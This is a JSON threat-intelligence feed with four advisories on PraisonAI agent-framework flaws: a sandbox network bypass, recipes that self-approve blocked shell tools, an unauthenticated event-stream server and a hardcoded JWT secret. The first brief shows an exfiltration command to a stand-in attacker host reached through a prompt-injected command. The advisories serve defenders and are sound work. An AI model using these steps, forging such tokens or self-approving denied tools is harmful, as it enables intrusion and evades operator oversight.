{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/vendors/mervinpraison/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["praisonai (\u003e= 1.2.3, \u003c= 1.7.1)"],"_cs_severities":["high"],"_cs_tags":["vulnerability","npm","sandbox","network-bypass","ghsa"],"_cs_type":"threat","_cs_vendors":["MervinPraison"],"content_html":"\u003cp\u003eThe npm package \u003ccode\u003epraisonai\u003c/code\u003e, specifically versions 1.2.3 up to and including 1.7.1, is affected by a critical network isolation bypass vulnerability identified as GHSA-gqmf-56h7-rrpf. The \u003ccode\u003eSandboxExecutor\u003c/code\u003e component in \u003ccode\u003enetwork-isolated\u003c/code\u003e mode, which is advertised to provide \u0026quot;No network access,\u0026quot; fails to implement robust OS-level network restrictions. Instead, it only injects proxy environment variables (e.g., \u003ccode\u003ehttp_proxy\u003c/code\u003e, \u003ccode\u003ehttps_proxy\u003c/code\u003e set to \u003ccode\u003elocalhost:0\u003c/code\u003e) into the child processes. This mechanism is insufficient for true network isolation, as any non-proxy-aware client or direct socket API call within the sandboxed command environment will bypass these variables and establish direct network connections. This flaw undermines the security guarantees applications rely on when executing untrusted or user-supplied code via \u003ccode\u003epraisonai\u003c/code\u003e, potentially enabling attackers to exfiltrate sensitive data or access internal network resources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts malicious input, such as a prompt-injected command, and submits it to an application utilizing the \u003ccode\u003epraisonai\u003c/code\u003e library.\u003c/li\u003e\n\u003cli\u003eThe vulnerable application executes the attacker-supplied command within the \u003ccode\u003eSandboxExecutor\u003c/code\u003e component, configured for \u003ccode\u003enetwork-isolated\u003c/code\u003e mode.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eSandboxExecutor\u003c/code\u003e spawns a child process (e.g., \u003ccode\u003esh -c [attacker_controlled_command]\u003c/code\u003e), inheriting environment variables like \u003ccode\u003ehttp_proxy=http://localhost:0\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker-controlled command, for instance, \u003ccode\u003ecurl http://attacker.com/data\u003c/code\u003e, executes a non-proxy-aware network client or direct socket API call.\u003c/li\u003e\n\u003cli\u003eThe non-proxy-aware client or API ignores the injected proxy environment variables and attempts to establish a direct outbound network connection.\u003c/li\u003e\n\u003cli\u003eThe operating system permits the direct connection, effectively bypassing the intended \u003ccode\u003enetwork-isolated\u003c/code\u003e sandbox boundary.\u003c/li\u003e\n\u003cli\u003eThe attacker's command successfully exfiltrates data from the compromised environment or accesses internal network services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe network isolation bypass in \u003ccode\u003epraisonai\u003c/code\u003e can lead to severe consequences for applications relying on its sandbox for security. If exploited, attackers can circumvent the intended network restrictions to exfiltrate sensitive data (e.g., local files, process output, environment variables) from the sandboxed command context. Furthermore, this vulnerability allows access to localhost services or internal network resources reachable from the host running the \u003ccode\u003epraisonai\u003c/code\u003e instance, potentially enabling lateral movement or further compromise. It can also permit requests to cloud metadata or service endpoints, leading to credential theft or escalation of privileges. Ultimately, the flaw enables bypass of application policies that assume command execution occurs without network access, compromising the integrity and confidentiality of the host system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePatch CVE-GHSA-gqmf-56h7-rrpf immediately\u003c/strong\u003e by upgrading the \u003ccode\u003epraisonai\u003c/code\u003e npm package to a version that contains a fix, or implement a workaround that employs OS-level network restrictions.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeploy the Sigma rules in this brief to your SIEM\u003c/strong\u003e to detect suspicious network utility execution originating from processes likely spawned by \u003ccode\u003epraisonai\u003c/code\u003e's \u003ccode\u003eSandboxExecutor\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEnable \u003ccode\u003eprocess_creation\u003c/code\u003e logging for all Linux servers\u003c/strong\u003e that run applications using the \u003ccode\u003epraisonai\u003c/code\u003e package to capture \u003ccode\u003esh\u003c/code\u003e, \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003enode\u003c/code\u003e, and \u003ccode\u003epython\u003c/code\u003e command line arguments.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReview \u003ccode\u003enetwork_connection\u003c/code\u003e logs\u003c/strong\u003e from systems using \u003ccode\u003epraisonai\u003c/code\u003e for outbound connections initiated by non-standard or unexpected processes to external or internal destinations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T15:06:26Z","date_published":"2026-06-18T15:06:26Z","id":"https://feed.craftedsignal.io/briefs/2026-06-npm-praisonai-network-bypass/","summary":"The npm package `praisonai` versions 1.2.3 through 1.7.1 contain a network isolation bypass vulnerability (GHSA-gqmf-56h7-rrpf) in its `SandboxExecutor` component's `network-isolated` mode, allowing non-proxy-aware client commands to establish direct network connections, leading to potential data exfiltration and access to internal services.","title":"npm PraisonAI SandboxExecutor Network Isolation Bypass Vulnerability (GHSA-gqmf-56h7-rrpf)","url":"https://feed.craftedsignal.io/briefs/2026-06-npm-praisonai-network-bypass/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["PraisonAI (\u003e= 4.5.87, \u003c 4.6.61)"],"_cs_severities":["high"],"_cs_tags":["application-vulnerability","policy-bypass","remote-code-execution","praisonai","python"],"_cs_type":"advisory","_cs_vendors":["MervinPraison"],"content_html":"\u003cp\u003eA critical policy bypass vulnerability affects PraisonAI, a recipe execution platform, specifically versions \u003ccode\u003ev4.5.87\u003c/code\u003e through \u003ccode\u003ev4.6.57\u003c/code\u003e. The platform's security model intends to block \u0026quot;dangerous tools\u0026quot; (e.g., \u003ccode\u003eexecute_command\u003c/code\u003e) unless an operator explicitly allows them via \u003ccode\u003eallow_dangerous_tools=True\u003c/code\u003e. However, an untrusted recipe can circumvent this control. By crafting a \u003ccode\u003eworkflow.yaml\u003c/code\u003e that declares a default-denied tool within an agent's \u003ccode\u003etools\u003c/code\u003e section and simultaneously using a top-level \u003ccode\u003eapprove:\u003c/code\u003e directive, the recipe can effectively self-approve the dangerous tool. This bypasses the initial security policy that only checks \u003ccode\u003eTEMPLATE.yaml requires.tools\u003c/code\u003e, enabling the recipe to execute arbitrary commands without operator consent. The vulnerability affects both local CLI usage and HTTP recipe-runner deployments, with potentially higher severity if exposed to authenticated users.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eAttacker crafts malicious PraisonAI recipe\u003c/strong\u003e: The attacker prepares a recipe consisting of a \u003ccode\u003eworkflow.yaml\u003c/code\u003e that declares a default-denied critical tool (e.g., \u003ccode\u003eexecute_command\u003c/code\u003e) under an agent's \u003ccode\u003etools\u003c/code\u003e section and includes \u003ccode\u003eapprove: [execute_command]\u003c/code\u003e at the top level, while ensuring the \u003ccode\u003eTEMPLATE.yaml requires.tools\u003c/code\u003e section does not list any dangerous tools.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eOperator runs untrusted recipe\u003c/strong\u003e: An operator or user runs the attacker-controlled recipe through the PraisonAI local CLI or an exposed HTTP recipe runner, critically without specifying \u003ccode\u003eallow_dangerous_tools=True\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInitial policy check bypassed\u003c/strong\u003e: \u003ccode\u003ePraisonAI\u003c/code\u003e's \u003ccode\u003e_check_tool_policy()\u003c/code\u003e function inspects only the \u003ccode\u003eTEMPLATE.yaml requires.tools\u003c/code\u003e list. Since the malicious \u003ccode\u003eworkflow.yaml\u003c/code\u003e avoids listing dangerous tools there, the recipe passes this initial security gate.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eYAMLWorkflowParser\u003c/code\u003e processes \u003ccode\u003eworkflow.yaml\u003c/code\u003e\u003c/strong\u003e: During the \u003ccode\u003e_execute_steps_workflow()\u003c/code\u003e phase, \u003ccode\u003eYAMLWorkflowParser\u003c/code\u003e parses the \u003ccode\u003eworkflow.yaml\u003c/code\u003e, resolving agent-level \u003ccode\u003etools:\u003c/code\u003e declarations and extracting the top-level \u003ccode\u003eapprove:\u003c/code\u003e directives.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eWorkflow self-approves dangerous tools\u003c/strong\u003e: The \u003ccode\u003eWorkflow.start()\u003c/code\u003e method invokes \u003ccode\u003eset_yaml_approved_tools()\u003c/code\u003e, which registers the tools specified in the \u003ccode\u003eapprove:\u003c/code\u003e directive (including the dangerous \u003ccode\u003eexecute_command\u003c/code\u003e) within the application's approval context, effectively self-approving them.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAgent executes dangerous command\u003c/strong\u003e: When the PraisonAI agent within the workflow attempts to utilize the \u003ccode\u003eexecute_command\u003c/code\u003e tool, it is treated as pre-approved due to the bypass, allowing the agent to proceed with its execution.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eArbitrary command execution\u003c/strong\u003e: The \u003ccode\u003eexecute_command\u003c/code\u003e tool then executes arbitrary operating system commands specified by the attacker within the \u003ccode\u003eworkflow.yaml\u003c/code\u003e, inheriting the privileges of the underlying PraisonAI process.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact\u003c/strong\u003e: This unapproved command execution can lead to remote code execution, data exfiltration, system compromise, or facilitate further lateral movement within the compromised environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis policy bypass allows an untrusted recipe to execute arbitrary commands with the privileges of the PraisonAI process. If an operator runs such a recipe, or if a PraisonAI HTTP recipe runner is exposed to users who can choose recipe names or URIs, successful exploitation can lead to full system compromise. The exact trigger for command execution depends on the specific workflow and model/tool-call path, but the core policy boundary is breached before execution. This impacts both local CLI usage of PraisonAI and deployments utilizing the HTTP recipe runner, potentially escalating to an authenticated remote execution issue if the API is accessible.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePatch \u003ccode\u003ePraisonAI\u003c/code\u003e\u003c/strong\u003e: Upgrade \u003ccode\u003ePraisonAI\u003c/code\u003e to version \u003ccode\u003e4.6.61\u003c/code\u003e or later immediately to address the vulnerability described in the GHSA advisory.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMonitor \u003ccode\u003eprocess_creation\u003c/code\u003e logs\u003c/strong\u003e: Deploy the Sigma rules provided in this brief to detect suspicious command execution originating from \u003ccode\u003ePraisonAI\u003c/code\u003e processes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEnable Sysmon logging\u003c/strong\u003e: Ensure Sysmon process creation and command line logging (Event ID 1) is enabled on all Windows systems running PraisonAI to facilitate detection of spawned shell processes.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T15:01:53Z","date_published":"2026-06-18T15:01:53Z","id":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-policy-bypass/","summary":"A policy bypass vulnerability in PraisonAI (CVE-NONE) allows untrusted recipes to self-approve and execute default-denied critical shell tools, such as `execute_command`, by declaring them in `workflow.yaml` instead of `TEMPLATE.yaml requires.tools`, leading to arbitrary command execution with the privileges of the PraisonAI process.","title":"PraisonAI Recipe Policy Bypass via YAML Workflow Approval","url":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-policy-bypass/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["praisonai (\u003e= 4.5.115, \u003c 4.6.61)"],"_cs_severities":["high"],"_cs_tags":["incomplete-fix","authentication-bypass","api-server","misconfiguration","data-exposure","praisonai"],"_cs_type":"advisory","_cs_vendors":["MervinPraison"],"content_html":"\u003cp\u003eA critical vulnerability exists in PraisonAI, affecting versions \u003ccode\u003e4.5.115\u003c/code\u003e through \u003ccode\u003e4.6.60\u003c/code\u003e, stemming from an incomplete fix for a previously disclosed unauthenticated access issue (GHSA-f292-66h9-fpmf). When an operator starts the A2U (Agent-to-User) event stream server using the documented \u003ccode\u003epraisonai serve a2u\u003c/code\u003e CLI command without explicitly configuring the \u003ccode\u003eA2U_AUTH_TOKEN\u003c/code\u003e environment variable, the server runs without any authentication. This default behavior contradicts the secure-by-default posture implied by the previous fix and current documentation, allowing unauthenticated access to sensitive agent event streams such as responses, tool calls, thinking/progress events, and stream metadata. Attackers can leverage this oversight to gain unauthorized insight into agent activities and potentially exfiltrate sensitive operational data if the server is exposed on a network interface.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn operator installs PraisonAI versions between \u003ccode\u003e4.5.115\u003c/code\u003e and \u003ccode\u003e4.6.60\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe operator starts the A2U server using the command \u003ccode\u003epraisonai serve a2u --host 0.0.0.0 --port 8002\u003c/code\u003e (or similar) without setting the \u003ccode\u003eA2U_AUTH_TOKEN\u003c/code\u003e environment variable.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003e_create_a2u_app()\u003c/code\u003e function in \u003ccode\u003esrc/praisonai/praisonai/cli/features/serve.py\u003c/code\u003e registers A2U routes.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecreate_a2u_routes()\u003c/code\u003e function in \u003ccode\u003esrc/praisonai/praisonai/endpoints/a2u_server.py\u003c/code\u003e checks for \u003ccode\u003eA2U_AUTH_TOKEN\u003c/code\u003e via \u003ccode\u003eos.environ.get()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eSince \u003ccode\u003eA2U_AUTH_TOKEN\u003c/code\u003e is not set, the authentication mechanism (\u003ccode\u003e_authenticate_request()\u003c/code\u003e) returns \u003ccode\u003eNone\u003c/code\u003e, effectively disabling authentication for all A2U endpoints.\u003c/li\u003e\n\u003cli\u003eAn unauthenticated attacker makes an HTTP GET request to \u003ccode\u003e/a2u/info\u003c/code\u003e, \u003ccode\u003e/a2u/subscribe\u003c/code\u003e, or \u003ccode\u003e/a2u/events/{stream_name}\u003c/code\u003e on the exposed PraisonAI A2U server.\u003c/li\u003e\n\u003cli\u003eThe server responds with sensitive agent event stream data, including agent responses, tool calls, thinking/progress events, and stream metadata, without requiring any credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker successfully exfiltrates sensitive operational data or gains intelligence on agent activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eAttackers who can reach an unauthenticated PraisonAI A2U server are able to subscribe to sensitive agent event streams without credentials. This exposed data includes agent responses, details of tool calls, internal thinking/progress events, and stream metadata. Organizations relying on PraisonAI and believing the previously announced fix or the secure-by-default documentation may inadvertently deploy the A2U server on network interfaces, exposing these streams. This could lead to the unauthorized disclosure of proprietary operational logic, sensitive internal data processed by agents, or intelligence on ongoing tasks, potentially compromising business operations, intellectual property, or client data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eUpgrade PraisonAI to a patched version\u003c/strong\u003e: Ensure all PraisonAI installations are updated to version \u003ccode\u003e4.6.61\u003c/code\u003e or later, as specified in the affected range \u003ccode\u003epip:praisonai \u0026gt;= 4.5.115, \u0026lt; 4.6.61\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImplement Authentication\u003c/strong\u003e: For any PraisonAI A2U server currently deployed, explicitly set the \u003ccode\u003eA2U_AUTH_TOKEN\u003c/code\u003e environment variable before starting the \u003ccode\u003epraisonai serve a2u\u003c/code\u003e command to enforce authentication.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeploy the Sigma rules\u003c/strong\u003e: Deploy the provided Sigma rules to detect unauthenticated access attempts to A2U endpoints in webserver logs.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReview deployment configurations\u003c/strong\u003e: Audit existing \u003ccode\u003epraisonai serve a2u\u003c/code\u003e deployments to confirm that \u003ccode\u003e--host 0.0.0.0\u003c/code\u003e is not used without proper authentication enabled, or that network segmentation limits access to trusted internal hosts only.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T15:00:49Z","date_published":"2026-06-18T15:00:49Z","id":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-unauth-a2u/","summary":"An incomplete fix in PraisonAI's `praisonai serve a2u` command leaves the A2U Agent-to-User event stream server unauthenticated by default, potentially exposing sensitive agent event streams to any attacker who can reach the server, bypassing intended authentication mechanisms for versions `4.5.115` to `4.6.60`.","title":"PraisonAI A2U Incomplete Authentication Fix (GHSA-jxcw-qp4h-6jfq)","url":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-unauth-a2u/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["praisonai-platform \u003c= 0.1.4"],"_cs_severities":["critical"],"_cs_tags":["authentication-bypass","hardcoded-credentials","jwt-forgery","python","supply-chain","misconfiguration"],"_cs_type":"advisory","_cs_vendors":["MervinPraison"],"content_html":"\u003cp\u003eThe \u003ccode\u003epraisonai-platform\u003c/code\u003e Python package, specifically versions 0.1.4 and older, developed by Mervin Praison, contains a critical vulnerability where its JSON Web Token (JWT) signing secret defaults to a publicly known string, \u003ccode\u003edev-secret-change-me\u003c/code\u003e. This misconfiguration stems from a flawed environment variable check in \u003ccode\u003epraisonai_platform/services/auth_service.py\u003c/code\u003e (SHA256: \u003ccode\u003ecc29d43c5412da2c73c818859b8d8b146587842999b777336017ab9d9e509258\u003c/code\u003e). The intended guard to prevent production deployments with the default secret fails if both \u003ccode\u003ePLATFORM_JWT_SECRET\u003c/code\u003e and \u003ccode\u003ePLATFORM_ENV\u003c/code\u003e are left unset, causing the application to silently start with the insecure secret. This enables unauthenticated attackers to forge arbitrary JWTs, effectively bypassing authentication for any user, including administrative accounts, across all routes protected by the \u003ccode\u003eget_current_user\u003c/code\u003e dependency.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access / Reconnaissance\u003c/strong\u003e: An unauthenticated attacker identifies a \u003ccode\u003epraisonai-platform\u003c/code\u003e instance, possibly by interacting with its API endpoints or discovering the underlying software version.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVulnerability Identification\u003c/strong\u003e: The attacker identifies that the application is running \u003ccode\u003epraisonai-platform\u003c/code\u003e version 0.1.4 or earlier and has not correctly configured its \u003ccode\u003ePLATFORM_JWT_SECRET\u003c/code\u003e and \u003ccode\u003ePLATFORM_ENV\u003c/code\u003e environment variables, leading to the use of the default \u003ccode\u003edev-secret-change-me\u003c/code\u003e JWT secret.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eToken Forgery\u003c/strong\u003e: Using the publicly known JWT secret (\u003ccode\u003edev-secret-change-me\u003c/code\u003e) and the HS256 algorithm, the attacker crafts a JWT with arbitrary claims, including \u003ccode\u003esub\u003c/code\u003e (user ID) and \u003ccode\u003eemail\u003c/code\u003e, for a target user (e.g., an administrative user like \u003ccode\u003eadmin@example.com\u003c/code\u003e or a known user ID).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAuthentication Bypass\u003c/strong\u003e: The attacker sends the forged JWT in an \u003ccode\u003eAuthorization\u003c/code\u003e header to a protected endpoint (e.g., \u003ccode\u003e/api/v1/workspaces\u003c/code\u003e, \u003ccode\u003e/api/v1/projects\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUser Impersonation\u003c/strong\u003e: The \u003ccode\u003epraisonai-platform\u003c/code\u003e server validates the forged token using the default secret and treats the attacker as the impersonated user (e.g., \u003ccode\u003eadmin-user-id-attacker-chose\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation / Unauthorized Access\u003c/strong\u003e: If the forged token impersonates an administrator or a member of a specific workspace, the attacker gains full access to that user's resources and permissions within the application, including creating, modifying, or deleting data.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact\u003c/strong\u003e: The attacker proceeds to exfiltrate data, tamper with application settings, or perform other malicious actions as the impersonated user.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis critical vulnerability directly leads to complete authentication bypass and privilege escalation within affected \u003ccode\u003epraisonai-platform\u003c/code\u003e deployments. An attacker can impersonate any user, including administrators, by forging JWTs with arbitrary user IDs and email addresses. All routes protected by the \u003ccode\u003eget_current_user\u003c/code\u003e dependency, which includes core functionalities such as managing workspaces, projects, issues, agents, and labels, become vulnerable to unauthorized access. The consequence is full compromise of the application's data and functionality, with potential for sensitive data exfiltration, system configuration changes, and disruption of service. There is no specific victim count, but any instance of \u003ccode\u003epraisonai-platform\u003c/code\u003e running the vulnerable versions without proper environment configuration is at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eImmediate Action\u003c/strong\u003e: Patch \u003ccode\u003epraisonai-platform\u003c/code\u003e to a version that addresses this vulnerability or ensure \u003ccode\u003ePLATFORM_JWT_SECRET\u003c/code\u003e is set to a strong, random, and unique value (at least 32 bytes) in all environments, including development. Set \u003ccode\u003ePLATFORM_ENV\u003c/code\u003e to a non-\u003ccode\u003edev\u003c/code\u003e value (e.g., \u003ccode\u003eproduction\u003c/code\u003e) for production deployments to ensure the built-in guard is active.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDetection Engineering\u003c/strong\u003e: Deploy the provided Sigma rule \u0026quot;Detect PraisonAI Platform Vulnerable File (SHA256)\u0026quot; to identify instances running the vulnerable \u003ccode\u003eauth_service.py\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSupply Chain Security\u003c/strong\u003e: Implement automated scanning for component vulnerabilities (SCA) to identify the presence of \u003ccode\u003epraisonai-platform \u0026lt;= 0.1.4\u003c/code\u003e in your software supply chain.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLog Configuration\u003c/strong\u003e: Ensure application logs are configured to capture environment variable settings on process startup, if possible, to detect instances where \u003ccode\u003ePLATFORM_JWT_SECRET\u003c/code\u003e is unset or \u003ccode\u003ePLATFORM_ENV\u003c/code\u003e defaults to \u003ccode\u003edev\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-06-18T14:43:44Z","date_published":"2026-06-18T14:43:44Z","id":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-platform-jwt-secret-forgery/","summary":"The `praisonai-platform` package, versions 0.1.4 and below, is critically vulnerable to authentication bypass and privilege escalation due to a hardcoded default JWT signing secret (`dev-secret-change-me`) that is inadvertently enabled in default deployments, allowing an unauthenticated attacker to forge JWTs and impersonate any user.","title":"PraisonAI Platform Vulnerable to JWT Forgery via Hardcoded Default Secret","url":"https://feed.craftedsignal.io/briefs/2026-06-praisonai-platform-jwt-secret-forgery/"}],"language":"en","title":"CraftedSignal Threat Feed - MervinPraison","version":"https://jsonfeed.org/version/1.1"}